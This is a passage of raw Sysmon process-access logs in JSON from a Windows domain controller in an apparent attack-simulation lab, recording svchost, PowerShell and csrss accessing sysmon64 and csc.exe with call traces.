|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4479,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4480,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4481,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nSourceProcessId: 2608\r\nSourceThreadId: 1824\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+43f7c1a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+43f7c1a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663981e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","SourceProcessId":"2608","SourceThreadId":"1824","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BD-5F25-0000-0010C0A90600}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+43f7c1a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+43f7c1a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663981e3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 